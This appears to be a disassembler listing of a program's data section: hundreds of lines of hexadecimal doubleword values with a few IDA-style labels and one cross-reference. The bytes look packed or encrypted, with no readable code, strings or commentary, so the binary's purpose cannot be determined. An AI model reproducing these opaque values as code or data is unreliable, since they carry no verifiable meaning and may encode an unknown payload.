dd 4EA6E689h, 0B2727670h, 0EC9706F1h, 9F2C569Bh, 0C5F58860h
dd 7389CB73h, 62CDEE43h, 2278C687h, 8612657h, 169F08BEh
dd 6205C5DFh, 1424BDDBh, 8BC81CBBh, 0CC3EDE77h, 7DCD9399h
dd 0C390CF1h, 0D3B81002h, 1CEBB3E1h, 0BE80575h, 0EB30A303h
dd 0CF6CE04Ah, 0DD56D866h, 0C9410D12h, 204356CCh, 3C6BAF49h
dd 522516h, 52035D41h, 2F9A490Dh, 5F1B0073h, 5B4E5700h
dd 240524C1h, 0DC08D110h, 50701BA2h, 305E8D7Ah, 4566538Ah
dd 0FC45BBA1h, 0FA05000Ah, 0B5D9F33Bh, 972B90Bh, 0CF0121Ch
dd 0E6CD0EF2h, 7EF464F3h, 1AEA18E8h, 0C6FF8EECh, 0D7F88B5Eh
dd 2175C084h, 140C45ABh, 59270F82h, 33207E8h, 236C2335h
dd 564C363Bh, 0EA48418Ah, 5B9103F6h, 2C211BBh, 0C063F0Bh
dd 0C8F3E488h, 0E1A10E7h, 0C018D814h, 0F9E41C0Bh, 2079F9F9h
dd 7C24103Eh, 0CC82813h, 1C0D9A2Ch, 766385AEh, 3A5D0284h
dd 0A6685CCh, 144ADDFDh, 0ADEED62Ch, 8B1E641Bh, 0A17C2003h
dd 7890E68h, 0F9F4FE42h, 780804D8h, 0EB3D8904h, 3E42C606h
dd 0A75B01B0h, 7F2E9142h, 832F00C7h, 9C6B5D8Eh, 344B1806h
dd 0D9422259h, 2C0B6BDEh, 1863031Ch, 9BB4389Fh, 0DE02EB3Ah
dd 0BE56B58Fh, 878CF709h, 4CCEDF58h, 0B60C5CA2h, 93319BDBh
dd 4B584EB8h, 610C7D83h, 0C190FF21h, 3E7883D2h, 0CE2E9D75h
dd 40C71EEBh, 0B1157E18h, 155603A7h, 0D22F3520h, 2A5E78E0h
dd 2184059h, 0F7CC7810h
dd 50AB527Eh, 60158A18h, 2EB2A06Dh, 854A22F6h, 58735672h
dd 0EB53C68Ch, 36B2A274h, 0C631ECEBh, 0DE56DD1Ch, 6285E75h
dd 37DEC86Ch, 28340CAAh, 0C36B7258h, 0F85DE223h, 83E04E57h
dd 68C0B511h, 0D2FC728Fh, 0FBC52E79h, 8FE4B7E9h, 5EB7B54h
dd 8D72B860h, 0C556456h, 0BFDB7F74h, 0EB367F89h, 647E80F0h
dd 684E3700h, 60518B53h, 5A6A418Bh, 0E91B5230h, 0AFFB810Ch
dd 0DAE0708h, 0A285C0A9h, 375D8CFh, 0F4ADB22Ch, 105866A5h
dd 428B18B8h, 0C8070B08h, 73483495h, 30FCA95Bh, 0EB1EEC18h
dd 0D08A1029h, 4617DCDh, 2E0AB5Ch, 4CFEBBD4h, 190F0977h
dd 3F5F2CF8h, 2C41E353h, 0D8FC480Fh, 0FCAEDB85h, 0F1D5DFFFh
dd 81102955h, 10008FAh, 8D477540h, 7B8D0E71h, 0A566A524h
dd 5B10288Bh, 300715ADh, 542B765Ch, 69F3DE90h, 19C46383h
dd 1DAEDB30h, 201A0CEBh, 0EDC1F612h, 9660DD6h, 14076604h
dd 0B2920A1h, 0ED9E95DDh, 94E36EBh, 0AB4DD618h, 2BDBAB66h
dd 2A07F335h, 1F42F63Eh, 56CED80Bh, 0C271430h, 0DB1A93EDh
dd 0A11947Ch, 0BC525114h, 0C3DDDC38h, 930CE0DBh, 8D3D10AFh
dd 2961470h, 0D3330807h, 8D5967D9h, 2A1C87DEh, 55908B21h
dd 216FB205h, 0D771057Bh, 22EB5850h, 0D03FDB20h, 921B0F06h
dd 8330528Bh, 4C50F121h, 4CB87E16h, 3C503769h, 833C0451h
dd 0F8522325h, 3A009980h, 0AF4F2318h, 0D33CECACh, 0CF0BF18Bh
dd 5109F1Dh, 88F93BB9h, 0A5FCF096h, 32943B60h, 8D5280C7h
dd 7D3BC478h, 7CA25F0Eh, 40970040h, 0FC3C478Bh, 8499E869h
dd 6CD30870h, 5A1DA857h, 1CFEE703h, 41D88FE3h, 528AD772h
dd 18EBD72Ah, 61708C31h, 3D200F24h, 0DF24770Ch, 0BE0C2F09h
dd 48A73FF4h, 0BEEFE337h, 89CF4AF4h, 0DCB8F77Dh, 0B6FB5B3Ah
dd 118F8B6h, 0F6FCE7B4h, 9AD7E141h, 0B674FBBBh, 0B376F3A6h
dd 19481BEDh, 7F839A3Ah, 0D051E244h, 16633661h, 1644D3C1h
dd 0D195B231h, 0D8BE552h, 0A2BA28F6h, 1E56D3E3h, 0AA6076A7h
dd 74E02254h, 7FFF61A3h, 6253A9F9h, 0C14D8B3Ah, 0D285118Bh
dd 0C28B0674h, 0F6EB108Bh, 16C6E083h, 0B4F47BAEh, 0EB0AA853h
dd 58EE2F8Eh, 0CA64B2Dh, 801A2083h, 29747682h, 14A0CF13h
dd 5EA8451h, 5638C390h, 3F964D42h, 6BEFEF14h, 99FF0BF7h
dd 6BAD086h, 5060460Ah, 7BC637Ch, 39868CBBh, 0B3D3BAA8h
dd 10E334F4h, 2464670Ch, 0A7923CA2h, 0F0772321h, 0F86C0313h
dd 5C7BDC5Bh, 3FF0D6Ah, 8B19755Ah, 112C4BA5h, 0A750A17Ch
dd 722D7744h, 0FB5BE519h, 30667B6h, 1CEB2A4Bh, 0A731859h
dd 76CF488Bh, 77CEF823h, 4F057314h, 401D13EBh, 1AD02D08h
dd 232C66B4h, 0DC1BA9EBh, 2C0BD5EAh, 3602148Bh, 39C1F67Bh
dd 0C16BBA67h, 1084108Fh, 0D85F13DCh, 8B336DCh, 762018A5h
dd 207D027Fh, 5F2D2DF8h, 65831404h, 0FE6234F4h, 0BF0D76FFh
dd 688940DBh, 0D950184Dh, 7D39C33Dh, 6097731Ch, 0C7EB1BE8h
dd 0B11C452Bh, 3AB04BA2h, 404321FDh, 7C3873FFh, 9EC567DFh
dd 8A2446ECh, 99274053h, 0D7F80F8h, 528B800Ah, 0F4752BBAh
dd 7815B2C9h, 3BC24C4Fh, 580EC34h, 26403636h, 0D81D6634h
dd 5E247565h, 68EB5EB3h, 0A16B41BAh, 0C9856846h, 55C0C137h
dd 4FEE51D8h, 49F17983h, 6152E1A9h, 8492574h, 59B28954h
dd 0E7C5CB63h, 0B7814E2h, 0F80FDA85h, 1C608014h, 364C781Ah
dd 0A5F62155h, 0A5F302E0h, 0F303E182h, 0D2701DA4h, 442F600h
dd 1A107C8Dh, 7DB073Dh, 18B334FCh, 4D486083h, 694408CEh
dd 2517631Bh, 55CF8388h, 0B9258B10h, 8DF01FBBh, 3C4A7383h
dd 40428911h, 133ED405h, 0B3C691Bh, 2D08C1A0h, 0AFB63087h
dd 24CE2E93h, 0AEF477F4h, 0C0999A23h, 448D83C1h, 85E4C08h
dd 291F4306h, 36707526h, 0F2D920D8h, 0ECE8EFE8h, 6C3E3874h
dd 514848E9h, 0DF1CA27Eh, 73F46EE6h, 2E54535Ch, 482C4434h
dd 0A95588DBh, 0BF208E44h, 156D2770h, 0D0B3F73Bh, 3C39710Ch
dd 5BA4743Ah, 0DFA6CC37h, 49D34160h, 46B2C340h, 8BC4D83Ah
dd 0AAD60235h, 0C34200C8h, 8BAD79Eh, 34068CD3h, 376B29D6h
dd 2C643F4Ah, 0EB30F09Ch, 1C16B805h, 2CD02320h, 84091CE1h
dd 8308716Ch, 94041534h, 0CCF2388h, 0CA57269Ch, 2342CF6h
dd 0C315709h, 0C1C1533Fh, 1B75E95Ah, 35DB14EBh, 0D98BC0ECh
dd 2075BEACh, 0A572DA2Bh, 83571393h, 0F8FBA4D8h, 1054DA12h
dd 2B74522Ch, 0D9F16102h, 0B02DCDB4h, 6CB23C75h, 3C6DB659h
dd 282C0230h, 0B06EED24h, 10748587h, 2D2CE62Ch, 5AADC62h
dd 0D083511Ah, 9D6F823Ah, 28BFFD09h, 4FB70FACh, 9AF52802h
dd 0D728FA46h, 63610E3Dh, 0F65BC64Bh, 399D21BBh, 95AA028h
dd 80E15B7h, 63118134h, 1DE5D6E6h, 830A021Fh, 9EEBB5CAh
dd 168AB58Bh, 20155960h, 0CC4388E6h, 3BE0011Ch, 0C06F6D80h
dd 890B7189h, 0C9180459h, 61D81378h, 0C857CA4Fh, 48701B22h
dd 72078B15h, 0D8C45C13h, 0B04B9436h, 6CB22F03h, 0A72D1BDBh
dd 56A1842h, 0C47E5A20h, 883BEDADh, 81048B34h, 5C7EC23Bh
dd 8DF423B3h, 368EE57h, 0BE530B74h, 0E75681E9h, 0E4403C1Bh
dd 8FFD1539h, 0F8503E8h, 22378B25h, 0A13D6A8Eh, 0A2586177h
dd 1A00059h, 0A8D4B38Bh, 0EF8DDDECh, 0DC89058Bh, 43240FEBh
dd 211C6A60h, 0B01B7ED0h, 3990BEDAh, 66CEBF31h, 8A156A37h
dd 0EC631675h, 0F0333BB9h, 0EC6E231Dh, 738B7136h, 6418354Dh
dd 574D7709h, 5968DE7Bh, 300558B6h, 30B4544Ch, 2E461B18h
dd 0C18D6CBh, 0AE545C48h, 79EC1950h, 125C3459h, 1DB7541Ah
dd 0DBBAFFEh, 9D8C90E8h, 53890405h, 4800C744h, 7D2BA31Ch
dd 3B01291Ah, 293BEC6h, 18EA44DBh, 7B43C770h, 631E5306h
dd 0BA2210B7h, 0C03EA48Eh, 63B96F5h
dword_4439A4 dd 34214CC6h db 0Ch, 84h, 12h
byte_4439AB db 0E5h ; DATA XREF: sub_449577+3�o
dd 6130B9A0h, 48845D14h, 0D721BB35h, 0E2A3526h, 0C90729E8h
dd 0B259F758h, 570A78A6h, 8468916Bh, 1875B58Ah, 6E0F7Bh
db 0DEh
dword_4439D5 dd 6FD40A29h db 1Ah, 6Ah, 1Bh
dd 59107A8Dh
db 7
dword_4439E1 dd 58E02C9Fh dword_4439E5 dd 0F3E14D18h db 0BFh, 6, 7Ch
dd 9C92E1Dh, 984E1051h, 3700A050h, 43B7991Ah, 6B863232h
dd 0CFC4632h, 0A64D4DCEh, 0A360398Ch, 0AB4665Bh, 0D6DB632h
dd 0AA640AD7h, 7A084A31h, 0D8FB7759h, 664AD1DEh, 14AAE0CAh
dd 8571324Bh, 118142C0h, 939C0C68h, 47AB5FA8h, 8F0C605Ch
dd 428E14B9h, 84F2D3CBh, 19315300h, 800E843Bh, 8A605CBBh
dd 6ECCEC27h, 66E290A4h, 4E5C8D80h, 4145670Ah, 8897C46Eh
dd 0C88FA00h, 81912530h, 1D1038ECh, 25CC2BC4h
db 57h, 12h
dword_443A76 dd 0CD6807BFh dw 0B9AEh
dd 0BAFF3304h, 80D9E6C3h, 0DCDAD896h, 6C9EFC04h, 0C8123B3Eh
dd 0CC0ECA0Ch, 0B18D010h, 0D27CD991h, 0F820D41Ah, 0D0289466h
dd 13E0036Dh, 0FD22CE2h, 1740D5D4h, 3056A253h, 656DA008h
dd 8D57C228h, 5B61995Dh, 1ED6A736h, 0C81C80Ah, 0CB21B758h
dd 0C83BD011h, 8B7D0500h, 3B180F6Ch, 3DB611D8h, 2284788Ch
dd 1F6F3FEEh, 0B809ECBAh, 8DF82004h, 0E7C17F0Ch, 0C42DB419h
dd 21C448EEh, 0DC0744D5h, 0ACE877F4h, 773A56EFh, 818953BFh
dd 0DC608D45h, 0B541D106h, 8C00F6E0h, 17A096DEh, 8BE04D5Bh
dd 0C1287D31h, 99A04581h, 0B9A2AFACh, 0DFFF4BBh, 0FF50BAB6h
dd 73738DC2h, 2E8932B8h, 0DF006A9Ah, 0B5F87A8Dh, 6675B6E5h
dd 8830DF8h, 2EC0304h, 0D68E96FBh, 279D06F4h, 1BE90114h
dd 6E6DF0B4h, 7B85B217h, 14F05E37h, 19B94600h, 150CFF1Eh
dd 0A00CFEEEh
db 93h, 0A0h
dword_443B72 dd 3889CABBh dw 0E35Fh
dd 1C31C651h, 0E2797BD4h, 8B8C6C6Ah, 0F4D7371h, 591B0FE0h
dd 39A32CD3h, 21C363A2h, 1A1EFBC3h, 5AD1130Ch, 0D71282Bh
dd 41828C14h, 83642673h, 750EBA43h, 0A80EE017h, 35978308h
dd 0D5B9C38h, 0F893904Ch, 481A9BD2h, 147B8128h, 75FCC401h
dd 34ACB807h, 0EB2AA6D8h, 0B9574637h, 5278A445h, 0C053093Ch
dd 1BD5304h, 8740735Ah, 4CD9682Fh, 0FDC468F1h, 6A5F9BBDh
dd 8BBF3B1Dh, 0A354BE4Ch, 14798193h, 0A17F06h, 8D6D01AEh
dd 0DC388120h, 0D0057605h, 1B1B6854h, 5E2C0600h, 9DDD3C72h
dd 5D142FA3h, 28302966h, 584A1911h, 6EA9C9Bh, 11BA5821h
dd 71516406h, 0E0EE818h, 7F674970h, 7F080211h, 0E085589Bh
dd 7427057Eh, 211D284Ah, 4D10B952h, 49C87A8Dh, 0C76687Dh
dd 8414468Ch, 7EA43957h, 5F182BABh, 8B104689h, 0C0E07C1Eh
dd 8156150Fh, 551DFAC3h, 0FF87B95Eh, 83560721h, 0ECEB60C3h
dd 0ED519AB8h, 4B181995h, 825373D6h, 0CCD57E74h, 0E43457DAh
dd 0B89A577h, 76320E83h, 8D47AA43h, 0FF477F47h, 0BEC9036h
dd 40F180CCh, 81478918h, 97078783h, 9E7C579Eh, 2DBD6057h
dd 8750AC5Ah, 7D68B43Eh, 0A3909805h, 663C6B3Ch, 0F06E81E0h
dd 0FF04C683h, 49937579h, 18BE450Ch, 58102D32h, 0D8901EF6h
dd 0BE9C712Ch, 0D8B4650h, 0BFEED048h, 147D0DFFh, 9B8D08Ah
dd 1588C83Bh, 55740754h, 1A2DFF06h, 0C459EF3Eh, 0DF3B098Bh
dd 1314F375h, 0D61B944Dh, 6F9B5379h, 8C359E97h, 754C56F9h
dd 44F01E47h, 4B541038h, 4503E158h, 0DE1A5718h, 0CA06C3C4h
dd 125FDD7h, 0F7502534h, 1CEB9710h, 102E1816h, 8733D58Ch
dd 0D1264492h, 553AB618h, 40081483h, 5A142F8h, 0B1CAA92Fh
dd 70BFD0EAh, 75899CABh, 8DF2507Ch, 55890E4Eh, 1B7558EEh
dd 3D35E6EDh, 5B80A5Ah, 83B08295h, 8C49BA80h, 7B99C51h
dd 558101C1h, 597860Fh, 483A09Bh, 8EEA4E8Fh, 0C0E52A74h
dd 350F607Eh, 1F1A7480h, 162ACA06h, 53270AA3h, 0F7C02A89h
dd 0C9282654h, 7461E177h, 0F4469E4Ah, 649D1274h, 388C58A9h
dd 0E0F45847h, 0F40064B7h, 430C4F30h, 8DCA5598h, 7827D027h
dd 3DD7BA1Fh, 4CA1BCA2h, 2A7A0310h, 45C7A942h, 0A84081E0h
dd 14B0DD08h, 76E58A54h, 72D6DF8Eh, 0FF2DA337h, 6A1FB9D3h
dd 47B42E0Eh, 0A238F34h, 0C51E41D6h, 21ADA256h, 10873159h
dd 0B7805736h, 4BD1C6Eh, 4450150Fh, 7F3AD737h, 0FA0C0951h
dd 0A266D0B0h, 53048A99h, 0BE87D54Ch, 0C25A9037h, 0FFD3A46Fh
dd 0D10C7B2h, 0EB343AC1h, 5152521Fh, 6A78C1D9h, 0D951387Dh
dd 0C9083056h, 53BF030Eh, 1FA53456h, 0E00225h, 27E78CB0h
dd 3AA1D41Ch, 6DBF80E5h, 31EA3C2Dh, 68870F0Bh, 0C60F3DCh
dd 0D9477188h, 10395F04h, 1A4D985Ah, 0FCD008AEh, 86D78123h
dd 11FC590Ch, 9C8726F0h, 0F8E4420Ch, 2B3BFCFCh, 5D3A2D81h
dd 0E155D28Fh, 0C00C61Eh
db 4Bh
dword_443EA1 dd 0CC9D82Ch db 0C8h, 81h, 0Ch
dd 93DD0808h, 1463E591h, 8F8080Fh, 0F25388E4h, 0F84E8BF8h
dd 6803B38Dh, 0DB93E21Dh, 83880855h, 5E599BA6h, 0D42A0F9Ah
dd 4A890842h, 1C019E08h, 147111AFh, 19B82B65h, 45E9926Fh
dd 0D5C70C7Fh, 0C803D620h, 0D2C2454Ch, 0F3E010F2h, 0C7E38BAh
dd 3941E77h, 31089F21h, 2162CB11h, 0D48A1721h, 7EBE2156h
dd 7C503909h, 0D8F3C934h, 0DA2D73C2h, 0C0177F04h, 9C481EBEh
dd 74CEE144h, 7091D90Dh, 0E36F897Bh, 0B89374C2h, 0C203B67h
dd 0F350874h, 0ECAB7736h, 58D8EB8Fh, 219F0A96h, 1F07B299h
dd 41124143h, 5C25810Eh, 6D93FE0Fh, 775981F4h, 58604303h
dd 90C197D7h, 76CCC334h, 0D9B0AF44h, 0AF6D3B21h, 1AA3EC98h
dd 5C009A40h, 3DEC7509h, 4E158468h, 90EDB75Dh, 264A161Ch
dd 362E3B0Ah, 8B19A69h, 0CDEF29Bh, 0C90C6DF3h, 1B0D2901h
dd 3491A758h, 0DBEFDB93h, 0C298473Dh, 0F586E944h, 0E44308Dh
dd 2D1669CFh, 0E30C992Ah, 0C0755314h, 773B8DDh, 7E806014h
dd 1A4E7572h, 56E82ED2h, 0D2333987h, 79307495h, 0C4B1CA0Ch
dd 0B94DC048h, 0B7F76F4Dh, 588B167Ah, 811058ECh, 4C0FFFE3h
dd 8060B8Ch, 9B1B6F75h, 0D1037E0Ch, 1ED24A47h, 0E82DF56Bh
dd 89B9147Eh, 9246C616h, 78FDB85Ah, 1454053Bh, 0C8DE03EBh
dd 19764948h, 5A75235Ch, 10580192h, 0B76B2A3Ah, 0FC8C366Fh
dd 83EA754Fh, 66807966h, 24B61986h, 0C2521B50h, 0B6183C17h
dd 0BA0217C4h, 105D3956h, 2BCB1871h, 34C17D9Fh, 8CE083Eh
dd 0DF45718Bh, 615D759Ch, 0D214D375h, 59385814h, 5B50751Ch
dd 41C16DBBh, 0CEF85D1Dh, 6FDF0804h, 0F3CE6A97h, 1481450h
dd 0D33BF855h, 476B5AD2h, 18EBC84Eh, 0CEA1394h, 0A5A6D423h
dd 0FFFAB6EFh, 0D3CAEBB3h, 8F142139h, 6F61FDFAh, 41C60405h
dd 46F616D6h, 0CDC0506h, 8AE75BEBh, 8EF84A87h, 0C06056E4h
dd 6C5AE6E5h, 0ADE114A8h, 0AF0089AAh, 6B77DDB2h, 3B368B2Dh
dd 7C74A5F3h, 0EDCFEB3Ch, 3E754B77h, 72553D74h, 8B027714h
dd 6E0629C2h, 2BDF0BB7h, 970413D0h, 744DA4EBh, 76101BA0h
dd 0D686172Bh, 0F3DB04EFh, 0DB6B3DD2h, 0D9AD0368h, 0CB270CD4h
dd 9AB41229h, 0C22A18ABh, 0BB48202Ch, 11586DAh, 4E863711h
dd 0C243B54Bh, 8714CAAAh, 1F6F4665h, 6A57BDABh, 8B145906h
dd 40B856FEh, 91B410E3h, 0CC2D0D29h, 0A3EECD6Ah, 14A06DC4h
dd 2B61566h, 0E08812B3h, 50620241h, 533C50D7h, 0CEE029Ch
dd 1EFE6FCCh, 66087E8Dh, 59C01FD0h, 0E8EB4654h, 8069568Ah
dd 0CE0F7ADBh, 3114E52Eh, 0D6CCE7BDh, 0F454061Dh, 0D81E6820h
dd 0B0CF642Dh, 101D619Dh, 0A91A6500h, 5A554036h, 54B4BDEEh
dd 0FD6F462Dh, 2CB7FE34h, 0F98C8CA0h, 0ED6FF39Fh, 9AB854D6h
dd 273FF9D1h, 0C03EDA75h, 5F82078Eh, 5393513Ch, 0E42D4B8h
dd 5BAB3717h, 6ABABC57h, 49BE721Bh, 36DF87B2h, 0B6803F7h
dd 1FC0F919h, 3C8C020Bh, 0D2C44647h, 888EC800h, 0CC8CFC18h
dd 0ED02CB85h, 0F803C68Dh, 0C19C36B3h, 456C1A24h, 0BD63061Bh
dd 9A3F1781h, 770127D1h, 42987E4Dh, 0B06F908Bh, 33FBBD40h
dd 14C1830Ch, 0B6CDE9F7h, 8853A8F1h, 756E0F45h, 84473314h
dd 74477DB3h, 170F4D8Ah, 0F62032A4h, 62257031h, 0D052B1AEh
dd 80B806BEh, 9B3646Dh, 1F29A381h, 0FB1DB270h, 0E80C7982h
dd 43D1CE49h, 524194BEh, 6A705B53h, 0E0A45574h, 7E08B1B9h
dd 0BAF89E14h, 1CD06D5Bh, 1122C420h, 206023F6h, 0E0E82B76h
dd 305D8C7h, 0EF178018h, 6CE51E89h, 76C0F02Fh, 0FB3B8E90h
dd 0B7D1B771h, 0E39A0247h, 2B548F7Bh, 0FD5A9F8Bh, 880C97CCh
dd 0B020887h, 0F012D83Bh, 2223351Eh, 284619EAh, 4BEC64D4h
dd 22F31AF5h, 8021424Ch, 3320531Fh, 111735Bh, 8859683h
dd 8158819Ch, 0D0431C06h, 0B36216D1h, 1E4B4D99h, 4646D4BDh
dd 0D8FC4646h, 161FDC94h, 0B30D46F6h, 8D69A5CBh, 0BF61EFBDh
dd 4D89C78Bh, 0BF188BC5h, 81A305BBh, 0CC7EA257h, 0A508EC65h
dd 3DCA9411h, 263E3789h, 6C1B9D6Fh, 0EC0F1A49h, 31FFB602h
dd 35B3AB68h, 41500611h, 5EF7FFF0h, 8303FB6Ch, 0F093A227h
dd 3FBFA559h, 0B7398840h, 0FE1A53ABh, 833FFFFh, 4A8A21B3h
dd 0A90249Fh, 57E94385h, 212DC646h, 99EBB054h, 16D171Fh
dd 88B2970Eh, 31756D3Fh, 48051E3Ah, 0C689898Ah, 4848516Ch
dd 0FFED8BF5h, 46E27992h, 6B38BF02h, 0D78A3030h, 3435EE6Bh
dd 810C0506h, 0D939768Ah, 0BB3CCF0Ah, 231C03F3h, 5ADEE11Ch
dd 6A05FE56h, 7593A3ACh, 40A1933Bh, 13291B31h, 8200B45h
dd 46CE14A3h, 0C38BFBADh, 92C1234Bh, 70143CA6h, 946CA136h
dd 6C2EFBC3h, 8AE742B6h, 3D8AA172h, 0CD86DA04h, 0D04BF6C4h
dd 54F28B8Ah, 0E1330060h, 0C34A655Ch, 4C35806Fh, 4D389049h
dd 27B0D988h, 4E06C7DEh, 0F73F3023h, 81010660h, 3C05F552h
dd 20111836h, 0C36245C7h, 80C03240h, 1A4CF488h, 0C7B0EBA2h
dd 91598C47h, 6C128365h, 0D8721C4Dh, 0F0A02F6h, 0C2123C74h
dd 6B57DAB3h, 0CD960E10h, 8083E03Ch, 85D8074Fh, 0B4D1E0Eh
dd 0B947B83h, 7C0F0854h, 1EE88F54h, 0BE2DE793h, 2521BBBh
dd 10053575h, 47F61974h, 0BD0B8312h, 10759E00h, 87B5C6Ah
dd 0B86AC530h, 0A7F366BBh, 570A758Fh, 145A539Ah, 28C00163h
dd 52325702h, 2961B258h, 7B2CD0D1h, 0D0C639D3h, 8B717401h
dd 6419CC86h, 4F274BECh, 0CD9E8D53h, 219086CBh, 868E1919h
dd 464EEF86h, 5BCB960Eh, 13750154h, 5D25B157h, 0ACB656ACh
dd 0E6E7AB04h, 7B015428h, 9102CC05h, 0C8919191h, 91BCDCC4h
dd 0B8919191h, 81D0C0B4h, 0D4919199h, 2800E0D8h, 0FFC8C945h
dd 86EDE200h, 0E9049EE8h, 86F000BAh, 0BFC22356h, 0FB362170h
dd 5A4DBA01h, 3C708B0Eh, 0B454C603h, 41BC1C8Dh, 6F001006h
dd 6ED7C2D1h, 5EE0EB38h, 221A0163h, 26FCBADDh, 0B179014h
dd 4A76F17Ch, 71D7D7Ah, 0FADEE87Fh, 8AC2037Fh, 3ACB8A18h
dd 841A751Eh, 588A30C9h, 715E0C01h, 5D5015BBh, 11464690h
dd 0A3FFE275h, 5CF7605h, 4FD8401Bh, 2045831Bh, 0A6818302h
dd 3CC78B42h, 0FC3B9672h, 7AB357C5h, 4A33BC72h, 6A2D20EEh
dd 0CAD8FF0h, 2B00B70Fh, 455D8DF2h, 0B5B882D4h, 0DF810630h
dd 2BDAAA4Eh, 410C53FAh, 31706164h, 52B5C800h, 40313F4h
dd 0FB0ED60Fh, 6F743BA5h, 176C6F63h, 30191244h, 1752F453h
dd 78F14267h, 5677C167h, 4B4D94D5h, 0C6480EBCh, 40912BBEh
dd 811D0CA9h, 0E4562A02h, 0D55787F4h, 7870B0BEh, 3201638h
dd 157AECF2h, 4E752D0Bh, 32C8B24h, 0A05DFA74h, 5DB0DFA3h
dd 0C3200FECh, 4FFF3F53h, 1601220Fh, 0F486B62h, 50762051h
dd 56C14BD4h, 68839E9Eh, 6A382D34h, 57DA3EA9h, 1CA3311Ah
dd 12B0F348h, 1694205Dh, 85CF2048h, 60C2141Ch, 72177C87h
dd 7862EC18h, 0CEB347A3h, 5B923E50h, 66B58889h, 71055E2Bh
dd 0E230122h, 0FB67DE21h, 7F1745Fh, 2FA1E918h, 6F1463BBh
dd 53F95C7h, 505C3D24h, 0D15BF7h, 764544h, 7630069h, 0DDC2895Ch
dd 0B64876Dh, 7720073h, 9B75D7AEh, 30B611Bh, 3741D6Dh
dd 5D631B72h, 8CDF203Ch, 17633B55h, 1F748DC1h, 9B216E65h
dd 6DCF7D17h, 52ED4950h, 6F630007h, 0CC0DB642h, 5C0D6937h
dd 9440B327h, 866CA911h, 0BDB43218h, 685CF0D0h, 50092EA8h
dd 6809E25Eh, 0B281DA18h, 0D4F72153h, 50125606h, 28261C4Bh
dd 0E25A865Ah
dd 0DA958308h, 85B7F6ADh, 0AA58070Dh, 944D22C4h, 0FC685153h
dd 0D6EE6F3Bh, 98209476h, 0DC89C88h, 6FEB006h, 3EE6E462h
dd 142F14B4h, 0B6C0E0B8h, 8FF6DB2Dh, 0D002CC28h, 7E2057D4h
dd 3EE6880Ch, 2F0C68E8h, 2F737940h, 1816C41Bh, 568B1E24h
dd 1DE6A38h, 8B1BE215h, 59A146FAh, 0E0071AB8h, 16D16F0Dh
dd 920B8F7h, 89345E92h, 8BF57002h, 8940F25Eh, 78464B86h
dd 0C1156354h, 0B894FA22h, 47EECEFFh, 4586874h, 0FF0E6CA3h
dd 8648B8D6h, 157CF3C8h, 0EA484C50h, 0C1D0F41Ch, 29CC6A53h
dd 6F4DECF3h, 51833D73h, 2FF39659h, 0F0683440h, 0F07651F1h
dd 0F0980AC4h, 0D0FA012h, 32D45314h, 4A06D97Ah, 30CC12D8h
dd 0E5333013h, 0C3031D65h, 564430E0h, 0A0302A34h, 2B02B4C9h
dd 1F5064FDh, 654B01C8h, 697053D3h, 0EA0C4C6Eh, 177451ADh
dd 0FB490121h, 0FEDDAEFEh, 626D7953h, 4C631C6Fh, 394171Ah
dd 516C7452h, 0B36A8975h, 49790DB6h, 55086107h, 3173ED92h
dd 0A895431Bh, 642BB677h, 542B565Ch, 64506DADh, 29162D49h
dd 66FEAA6Bh, 6F436695h, 656C706Dh, 0DB3E7164h, 0F3951B92h
dd 634200F7h, 68A0C6C0h, 17FA5A4Ah, 0F24DF6B5h, 5D376E49h
dd 257E3C45h, 5E85FAA1h
dword_444804 dd 735002D7h dword_444808 dd 0B09F6B95h dword_44480C dd 22BD27B3h dd 6E416F54h, 176B8D1Bh
db 65h
dword_444819 dd 4DEA330Eh db 64h, 0F2h, 0BFh
dd 4E7EB6C7h
db 2, 4Dh
dword_444826 dd 4CEC4D6Dh dw 506Bh
dd 0BAD76761h, 7B9AA802h, 66624FE0h, 7E03661Eh, 4DB3585Eh
dd 52B517D4h, 0A1794214h, 41AACEDAh, 0EE780145h, 0D9F6C355h
dd 70795417h, 5369F913h, 186DFF95h, 736F1A05h, 6C6E726Bh
dd 2E78652Eh, 0B536D6E1h, 384B664Bh, 4F827361h, 0EFC97336h
dd 71634113h, 50726975h, 42ED7708h, 4973DEDBh, 48AD7172h
dd 69613E0Dh, 70B6BB33h, 44D40D7Bh, 5D65A370h, 0B14C4117h
dd 95517C08h, 0B5DBC174h, 0AD556764h, 22DC1176h, 0E2DAA95Bh
dd 158B5074h, 70DDCC27h, 42BDFEA8h, 19D46675h, 0E42581C8h
dd 6029332Ch, 5F4B0E49h, 8D0C4572h, 41006DEAh, 0C5BD6372h
dd 0D6DAF685h, 226EBAA3h, 0AB36EF33h, 69B7BC2Ah, 11F00AEh
dd 3DE4A033h, 0E55ACF6Ch, 42744136h, 0B726256Fh, 99802D92h
dd 662B2B95h, 65488DDDh, 3C797056h
dword_444914 dd 6422156Dh dword_444918 dd 1D141587h dd 491AF975h, 2E0D891Fh, 0A1535953h, 0D5F14AC8h, 0B6188901h
dd 90072D17h, 193001E6h, 0C95B4804h, 0C04F14B2h, 0D7431304h
dd 56B453C0h, 45055F9Dh, 0D034CDEDh, 4FAB5340h, 8B055FB3h
dd 46B9FE78h, 4BD4F0Bh, 6D03FEEFh, 452B26C3h, 473F075Dh
dd 7210B4EFh, 31631901h, 6C341D73h, 697B744Fh, 74D6735h
dd 61AE839Bh, 0D490D6Ch, 40232B66h, 3BAEB1BCh, 390334B9h
dd 64C76207h, 751D75D0h, 2343171Eh, 14B0736Dh, 2073C80Dh
dd 0C1886181h, 6B617418h, 339B20AFh, 0D13DF74Dh, 6F116307h
dd 3D927920h, 0CF76E0C4h, 0C1531407h, 3DF6DC0Ch, 0F34F7953h
dd 9DD6375Dh, 4B3354CFh, 6C056E2Dh, 0E066520Dh, 31C307BAh
dd 8DCF1375h, 119EE61Dh, 44CB4715h, 44946315h, 70698DD7h
dd 6E2D6979h, 0F7595B1Fh, 516849B6h, 53996521h, 0B9018905h
dd 560B0036h, 1C2B5881h, 0EF324B97h, 0F3070585h, 3135C8D8h
dd 7002E37h, 6665C44Fh, 61B774B0h, 0EBAF6ED5h, 71E790B6h
dd 1B4C2F29h, 1B842967h, 930D0EEBh, 0A3678D79h, 0ECAE1021h
dd 1B2013D9h, 0BA1AEB06h, 0BF3215A9h, 92D0530h, 0CEC26233h
dd 770C9B8Ah, 2F0D3054h, 51646DC6h, 742672C7h, 576FB38Fh
dd 0B6B7D29h, 0CC348D83h, 4F3E1FD5h, 6C096993h, 2FE76612h
dd 0A461EF6Eh, 72EBAC1h, 0D205779h, 0E7C77550h, 576106C6h
